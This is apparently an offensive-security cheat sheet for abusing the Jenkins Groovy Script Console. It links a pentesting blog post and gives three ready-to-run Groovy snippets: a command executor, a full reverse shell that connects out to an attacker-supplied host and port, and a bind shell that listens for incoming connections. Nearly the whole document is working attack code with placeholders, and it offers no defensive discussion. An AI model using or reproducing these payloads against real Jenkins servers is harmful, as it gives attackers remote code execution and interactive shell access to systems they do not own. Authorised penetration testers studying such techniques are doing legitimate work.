-
https://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6
-
"Manage Jenkins" > "Script Console" > Run.
Execute command:
{% code title="exec.groovy" %}
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'whoami'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"{% endcode %}
Reverse shell:
{% code title="reverse.groovy" %}
String host = "<LHOST>";
int port = <LPORT>;
String cmd = "/bin/bash"; // or "cmd.exe" for Windows
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
while (pi.available() > 0)
so.write(pi.read());
while (pe.available() > 0)
so.write(pe.read());
while (si.available() > 0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
} catch (Exception e) {}
};
p.destroy();
s.close();{% endcode %}
Bind shell:
{% code title="bind.groovy" %}
int port = <LPORT>;
String cmd="/bin/bash"; // or "cmd.exe" for Windows
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new java.net.ServerSocket(port).accept();
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
while (pi.available() > 0)
so.write(pi.read());
while (pe.available() > 0)
so.write(pe.read());
while (si.available() > 0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
} catch (Exception e) {}
};
p.destroy();
s.close();{% endcode %}